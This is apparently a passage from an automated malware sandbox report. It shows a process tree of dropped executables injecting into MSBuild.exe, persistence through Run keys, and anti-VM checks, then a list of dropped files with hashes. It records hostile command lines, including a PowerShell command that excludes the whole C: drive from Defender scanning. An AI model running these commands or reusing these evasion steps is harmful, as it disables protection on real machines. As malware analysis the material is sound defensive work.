                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                            7⤵
                                                            • Checks SCSI registry key(s)
                                                            PID:6036
                                                        • C:\Users\Admin\AppData\Local\Temp\10494280101\NlmvJyQ.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10494280101\NlmvJyQ.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          PID:5980
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                            7⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:1524
                                                        • C:\Users\Admin\AppData\Local\Temp\10494540101\31W3sid.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10494540101\31W3sid.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          PID:5124
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                            7⤵
                                                              PID:5360
                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                              7⤵
                                                                PID:5368
                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                7⤵
                                                                  PID:5312
                                                              • C:\Users\Admin\AppData\Local\Temp\10494550101\DgQBvwg.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10494550101\DgQBvwg.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Adds Run key to start application
                                                                • Suspicious use of SetThreadContext
                                                                PID:5828
                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\chul1at5\chul1at5.cmdline"
                                                                  7⤵
                                                                    PID:5300
                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF18F.tmp" "c:\Users\Admin\AppData\Local\Temp\chul1at5\CSC351D5BC91D314C6DBA665BB31AA37275.TMP"
                                                                      8⤵
                                                                        PID:5004
                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                      7⤵
                                                                        PID:4408
                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                        7⤵
                                                                          PID:5188
                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                          7⤵
                                                                            PID:5180
                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                            7⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:5236
                                                                        • C:\Users\Admin\AppData\Local\Temp\10494560101\larBxd7.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\10494560101\larBxd7.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:1488
                                                                        • C:\Users\Admin\AppData\Local\Temp\10494570101\9sWdA2p.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\10494570101\9sWdA2p.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:3632
                                                                        • C:\Users\Admin\AppData\Local\Temp\10494580101\Rm3cVPI.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\10494580101\Rm3cVPI.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:6112
                                                                        • C:\Users\Admin\AppData\Local\Temp\10494590101\v1BRaoR.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\10494590101\v1BRaoR.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:5240
                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                            7⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:4084
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 1148
                                                                              8⤵
                                                                              • Program crash
                                                                              PID:1892
                                                                        • C:\Users\Admin\AppData\Local\Temp\10494610101\ibC8xs1.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\10494610101\ibC8xs1.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Adds Run key to start application
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:5136
                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vlzxykbj\vlzxykbj.cmdline"
                                                                            7⤵
                                                                              PID:5684
                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D66.tmp" "c:\Users\Admin\AppData\Local\Temp\vlzxykbj\CSC520D6031D5FB467AA033FAFFAB5FBDE.TMP"
                                                                                8⤵
                                                                                  PID:4916
                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                7⤵
                                                                                  PID:5796
                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                  7⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:4284
                                                                              • C:\Users\Admin\AppData\Local\Temp\10494620101\UZPt0hR.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\10494620101\UZPt0hR.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                PID:5024
                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                  cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                  7⤵
                                                                                    PID:4872
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                      8⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      PID:3212
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    "C:\Windows\system32\svchost.exe"
                                                                                    7⤵
                                                                                    • Downloads MZ/PE file
                                                                                    • Adds Run key to start application
                                                                                    PID:5800
                                                                                    • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                                                      "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:3912
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell Add-MpPreference -ExclusionPath C:\
                                                                                        9⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        PID:13296
                                                                                    • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5392
                                                                                • C:\Users\Admin\AppData\Local\Temp\10494630101\521f01c054.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\10494630101\521f01c054.exe"
                                                                                  6⤵
                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                  • Executes dropped EXE
                                                                                  • Identifies Wine through registry keys
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:1608
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                        1⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:3104
                                                                        • C:\Windows\explorer.exe
                                                                          explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                          2⤵
                                                                            PID:2204
                                                                        • C:\Windows\explorer.exe
                                                                          C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                          1⤵
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:4460
                                                                          • C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                            "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:3624
                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rnb0gndc\rnb0gndc.cmdline"
                                                                              3⤵
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:3152
                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4939.tmp" "c:\Users\Admin\AppData\Local\Temp\rnb0gndc\CSC72FF7E72B1BE408EA7AB5E18EF1F27F5.TMP"
                                                                                4⤵
                                                                                  PID:4308
                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                3⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:1652
                                                                          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                            1⤵
                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                            • Checks BIOS information in registry
                                                                            • Executes dropped EXE
                                                                            • Identifies Wine through registry keys
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:4916
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                            1⤵
                                                                              PID:2816
                                                                              • C:\Windows\explorer.exe
                                                                                explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                                2⤵
                                                                                  PID:4924
                                                                              • C:\Windows\explorer.exe
                                                                                C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                1⤵
                                                                                  PID:4716
                                                                                  • C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:4012
                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a5eryn1z\a5eryn1z.cmdline"
                                                                                      3⤵
                                                                                        PID:1376
                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA4C7.tmp" "c:\Users\Admin\AppData\Local\Temp\a5eryn1z\CSC692FF0CC5DAE4F309BBA43619390BD5E.TMP"
                                                                                          4⤵
                                                                                            PID:3020
                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                          3⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:2376
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                      1⤵
                                                                                        PID:3112
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3184 -ip 3184
                                                                                        1⤵
                                                                                          PID:5196
                                                                                        • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                          1⤵
                                                                                            PID:5416
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                                            1⤵
                                                                                              PID:5316
                                                                                              • C:\Windows\explorer.exe
                                                                                                explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                                                2⤵
                                                                                                  PID:5404
                                                                                              • C:\Windows\explorer.exe
                                                                                                C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                1⤵
                                                                                                  PID:5744
                                                                                                  • C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:5136
                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dxf15kdc\dxf15kdc.cmdline"
                                                                                                      3⤵
                                                                                                        PID:5708
                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES19C.tmp" "c:\Users\Admin\AppData\Local\Temp\dxf15kdc\CSC4A500E97DE8A4BD7AA9970A462CF64D.TMP"
                                                                                                          4⤵
                                                                                                            PID:2664
                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                          3⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:2128
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                      1⤵
                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Executes dropped EXE
                                                                                                      • Identifies Wine through registry keys
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      PID:5968
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4084 -ip 4084
                                                                                                      1⤵
                                                                                                        PID:1044
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                                                        1⤵
                                                                                                          PID:4420
                                                                                                          • C:\Windows\explorer.exe
                                                                                                            explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                                                            2⤵
                                                                                                              PID:4804
                                                                                                          • C:\Windows\explorer.exe
                                                                                                            C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                            1⤵
                                                                                                              PID:3168
                                                                                                              • C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:544
                                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yu5fohft\yu5fohft.cmdline"
                                                                                                                  3⤵
                                                                                                                    PID:6036
                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES76BD.tmp" "c:\Users\Admin\AppData\Local\Temp\yu5fohft\CSC92AC2A8385040EAAF21D2EDA277556.TMP"
                                                                                                                      4⤵
                                                                                                                        PID:1680
                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                      3⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:6088
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                                  1⤵
                                                                                                                    PID:5108
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                                    1⤵
                                                                                                                      PID:2832

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                    Replay Monitor

                                                                                                                    Loading Replay Monitor...

                                                                                                                    Downloads

                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                      Filesize

                                                                                                                      80KB

                                                                                                                      MD5

                                                                                                                      aa7204a25f5e587fb2756f3b43014ff4

                                                                                                                      SHA1

                                                                                                                      2d0f0476fc28bad04c0c4ae5c42dd0d22ab21840

                                                                                                                      SHA256

                                                                                                                      9580213d109f3ba0c738264832f2ffcb60b226dc4611cfed505f8e651bbf39dd

                                                                                                                      SHA512

                                                                                                                      b144db0a7c8f579a3164562819bba71ba1ed7851f9e01f428cfc4c127feae1b6883b390b413936b9f285e31b17d71627bf40d9eaccbf268d79a7405f61960e6f

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\exp.exe.log

                                                                                                                      Filesize

                                                                                                                      633B

                                                                                                                      MD5

                                                                                                                      043a3f7769ea45be84cb4c60761c6a71

                                                                                                                      SHA1

                                                                                                                      cdce7657f5026424e5a56963551e5857b0111bb1

                                                                                                                      SHA256

                                                                                                                      d9fcde1d11472b92a9ee9936baeda9081080e80d66c06871423455877b4f8c30

                                                                                                                      SHA512

                                                                                                                      63a7a7dc33cf131923c0cbf0dac5f21af8fef312a6a78b69173a42b164557cc6aa084ed4be6b66c87bfe899eef995defb7044c3d40ce5616a11d12ead2bb6064

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                      Filesize

                                                                                                                      280B

                                                                                                                      MD5

                                                                                                                      eec55fe349980566b1dbf1d409d28c3e

                                                                                                                      SHA1

                                                                                                                      654ce4b550defea0851f12e8ff81ae9298bb3f60

                                                                                                                      SHA256

                                                                                                                      2e81ea3d7ddfc0274f3955d5131143c481e63f2529514c5295873b393d508efe

                                                                                                                      SHA512

                                                                                                                      58e02658d08732b5f36e868331a483b5fde15475a6c5f704a19c97d920399c3f7d41a8fa163c66683bf403598f8f48f0cf9fa468f9783fcabd9136a55cec0059

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                      Filesize

                                                                                                                      280B

                                                                                                                      MD5

                                                                                                                      5a7e1750438748bd333b79a94ca69b2a

                                                                                                                      SHA1

                                                                                                                      94fd1be56969e269ce195ba29c3d464d356d6556

                                                                                                                      SHA256

                                                                                                                      6d7a64a318c25c643323d5cf1c0c80ccf2f2433e7d74b722fca90468f8f9b914

                                                                                                                      SHA512

                                                                                                                      842509c0f495ee24d152ab3f7867183d7cd64b01b5a9305405682abbbff3aa18a8ad7d97ee039393fdd1766fc17ad2df1caf711dc4db8dc7b9df608ffc0fdc7e

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

                                                                                                                      Filesize

                                                                                                                      69KB

                                                                                                                      MD5

                                                                                                                      164a788f50529fc93a6077e50675c617

                                                                                                                      SHA1

                                                                                                                      c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48

                                                                                                                      SHA256

                                                                                                                      b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17

                                                                                                                      SHA512

                                                                                                                      ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                      Filesize

                                                                                                                      2B

                                                                                                                      MD5

                                                                                                                      d751713988987e9331980363e24189ce

                                                                                                                      SHA1

                                                                                                                      97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                      SHA256

                                                                                                                      4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                      SHA512

                                                                                                                      b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                      Filesize

                                                                                                                      6KB

                                                                                                                      MD5

                                                                                                                      6cc0962628a8d8e004a9dec5cdfe6bb9

                                                                                                                      SHA1

                                                                                                                      92a452aa6cd07079bfcaede5f9fe8dd05e55337f

                                                                                                                      SHA256

                                                                                                                      85170e039b3df05538bf3cafbed54336d80437cafd30b087b1289a9d53664d49

                                                                                                                      SHA512

                                                                                                                      c4a643d9da7e0c6be0d51d42b38a2400a1ff285f3a85f4ce747ee4439fcd63c20225f5787bed14e23b7b04a704f22d4d38467b67b22550f26da73ab32e773313

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                      Filesize

                                                                                                                      7KB

                                                                                                                      MD5

                                                                                                                      2d494f8d684e6322d7ae36ba85fdd0a9

                                                                                                                      SHA1

                                                                                                                      266899733f10f47ad40bdf2c8de79f9caa1b995b

                                                                                                                      SHA256

                                                                                                                      b3cc81e961fb82653ab4dcecd9c813286e1425e9f61da947c7285d7136544c55

                                                                                                                      SHA512

                                                                                                                      d595909592f9cb0df9ea2b431def78726a90bee448bf606494674450b6feb30dc95d4ba577cf2d24c48a3944d5c8b2bc3dc6948d7d524151fab1919002e050aa

                                                                                                                    • C:\Users\Admin\AppData\Local\TempTHADHBEIZF2GNMUBHMCM3SUZ6AL5WLL5.EXE

                                                                                                                      Filesize

                                                                                                                      3.1MB

                                                                                                                      MD5

                                                                                                                      0bc69609d28f954c1349365683ce5230

                                                                                                                      SHA1

                                                                                                                      6fb6d7ec9d7b32a8f63059357655206042362dbc

                                                                                                                      SHA256

                                                                                                                      9a1ec9edad991c2bd77e8cbedce6047caa84cde2e11ca30959ba4b3d7c6b7895

                                                                                                                      SHA512

                                                                                                                      9ec59259560f5fddde939e82aad2c588535edeba2d71af83cfa12dbc58d332c2b3c78d3009f119350067854185899357cd641047133a19c258b810711fd85b92

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe

                                                                                                                      Filesize

                                                                                                                      18.2MB

                                                                                                                      MD5

                                                                                                                      2ed83182a2c54f262b0b63ab54ebe8f2

                                                                                                                      SHA1

                                                                                                                      4a3a0e023b11d89e21fe2d410d329dd3087cc259

                                                                                                                      SHA256

                                                                                                                      6b15d8a3ac38d07997df344bde98a1eabd49bf52f5fe4c8f256c60951859021d

                                                                                                                      SHA512

                                                                                                                      5c9656af97dafaaa29e415b39ee679ab3ac6c746b29ee79ac50a662b0c07003731d18a7e3fbc5941942ebda195e768a99c38116f75bbaa17fe6d2dba7ff33d97

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10492200101\v1BRaoR.exe

                                                                                                                      Filesize

                                                                                                                      3.5MB

                                                                                                                      MD5

                                                                                                                      d546ca721b7eb5805324a652167e9d06

                                                                                                                      SHA1

                                                                                                                      078ef0b03d72ad77b6c0aef6d5643548bd4014cd

                                                                                                                      SHA256

                                                                                                                      b744ab8e1f5b87327281e9c6559c8f8d460439c054dd3783ed395137fcae8064

                                                                                                                      SHA512

                                                                                                                      79290e1ad225916c8ff473c7866770a01c42d9d5a77687314153548ca049dfc0521c29111c3f3239ef4ada7f127826a6dbf3ebc472e83a422901cec04230ef23

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10492700101\Nehh6wZ.exe

                                                                                                                      Filesize

                                                                                                                      674KB

                                                                                                                      MD5

                                                                                                                      32449d0a9a4698567ce8f4900e2cb370

                                                                                                                      SHA1

                                                                                                                      55817857ea2a8c6781eefd542f8f65bae756314a

                                                                                                                      SHA256

                                                                                                                      16beaf84a5f731c5c450a8535b9d53e1aa7184e230883bd57b351bf4561bec72

                                                                                                                      SHA512

                                                                                                                      b81c603d2e795093764ab807793f0403ff94feaa2155d68a9c75cc1eceb9360a4c54aedfd90a857f7e0333a3dbae6a0d3bbb9a40e017697b9d3511637f2bc74f

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10493560101\31W3sid.exe

                                                                                                                      Filesize

                                                                                                                      351KB

                                                                                                                      MD5

                                                                                                                      b319ac6eebf5309c09a2343aa872bb45

                                                                                                                      SHA1

                                                                                                                      36c20894e6b4eab76812276b35acf42b1e843bb8

                                                                                                                      SHA256

                                                                                                                      d6d59048de8343ea4e41f256925e6f453b9b7d3fd0212e566cd90c9bd6235566

                                                                                                                      SHA512

                                                                                                                      9fe8b5dc04404061557327b6bc20b91a22a800daa8b56a9befbb6ba9f1ec79ee9c74d653bbf41680a3e2f6f68e81f5ce22103df02502d7ca05b4db499bd5c652

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10494280101\NlmvJyQ.exe

                                                                                                                      Filesize

                                                                                                                      674KB

                                                                                                                      MD5

                                                                                                                      c6a119bfd5690fd9740d4b0ceda18c46

                                                                                                                      SHA1

                                                                                                                      df5dab76f8b434996d47261010066764b514d016

                                                                                                                      SHA256

                                                                                                                      9d2adad9a2ce99316677b5133953f620720286d5820c0d54adb610ddb71cb8bd

                                                                                                                      SHA512

                                                                                                                      7b32de5296b3b73965fb8b274229402673c5ac993f8abafc3304e48e1cf44bfd5fb40433948d7616ded8bf5da251bbfe152287a11b7e072d42ab609854cf659a

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10494560101\larBxd7.exe

                                                                                                                      Filesize

                                                                                                                      8.8MB

                                                                                                                      MD5

                                                                                                                      79615746124e8e66ce5d578fc7da30d5

                                                                                                                      SHA1

                                                                                                                      dd2b73e558fc20179fe4abc998ffcdab3551c705

                                                                                                                      SHA256

                                                                                                                      b6d8191caf0fb0a1e1e93094a67444b426bf2591a9aac51192de8de5fdddc73a

                                                                                                                      SHA512

                                                                                                                      11c886a7d222e8bba89ef43bbc8dc722fad9bcf4a519df2d1d984e5a03a74ce52bc5be1ac7c77acce57168e3d737438b4c3d292e64356277597dadd2a5e5417e

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10494570101\9sWdA2p.exe

                                                                                                                      Filesize

                                                                                                                      1.1MB

                                                                                                                      MD5

                                                                                                                      5adca22ead4505f76b50a154b584df03

                                                                                                                      SHA1

